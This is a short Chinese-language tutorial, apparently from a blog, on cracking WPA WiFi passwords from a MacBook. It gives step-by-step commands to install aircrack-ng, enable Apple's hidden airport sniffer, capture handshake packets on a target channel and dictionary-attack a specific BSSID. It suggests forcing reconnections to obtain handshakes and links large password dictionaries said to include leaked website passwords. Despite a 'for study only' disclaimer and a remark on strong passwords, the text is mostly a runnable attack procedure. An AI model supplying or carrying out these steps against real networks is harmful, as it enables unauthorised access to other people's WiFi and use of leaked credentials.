文本僅供學習交流。
我使用的系統是macbook pro 15:
安裝aircrack-ng
使用homebrew安裝,命令:
brew install aircrack-ng
抓包-抓取帶密碼的握手包
macbook自帶了一個wifi工具:airport。
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
首先,斷開wifi:
查看周圍的wifi:
$ /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s
查看本機的無線網卡設備:
$ ifconfig
抓包:
airport可以使用網卡的監聽模式抓取周圍的無線網絡數據包。其中,對我們最重要的數據包是:包含密碼的包-也叫握手包。當有新用戶或斷開用戶自動連接wifi時,會發送握手包。有一種攻擊方式是reinjecting packet,它可以強制無線路由器重啟,這樣當用戶自動連接時可以獲得握手包。
$ sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport en0 sniff 6
en0是無線網卡設備;6是要破解wifi的CHANNEL。
靜等用戶連接wifi,獲得握手包。
抓的包,保存在/tmp:
破解wifi密碼
獲得握手包之后,我們還需要破解加密的密碼。
好的密碼字典一個,應包含常見的弱密碼、手機號、姓名生日組合、各大網站泄露的密碼、英語單詞等等。如果使用字典破解不了,說明密碼還算復雜;暴力窮舉更是費時費力。(論復雜密碼的重要性)。
$ sudo aircrack-ng -w password.txt -b c8:3a:35:30:3e:c8 /tmp/*.cap
-w:指定字典文件;-b:指定要破解的wifi BSSID。
破解過程:
我使用的密碼字典:
http://pan.baidu.com/s/1clxaCA (全,未壓縮15G)http://pan.baidu.com/s/1o7MCcHk (簡,未壓縮680M)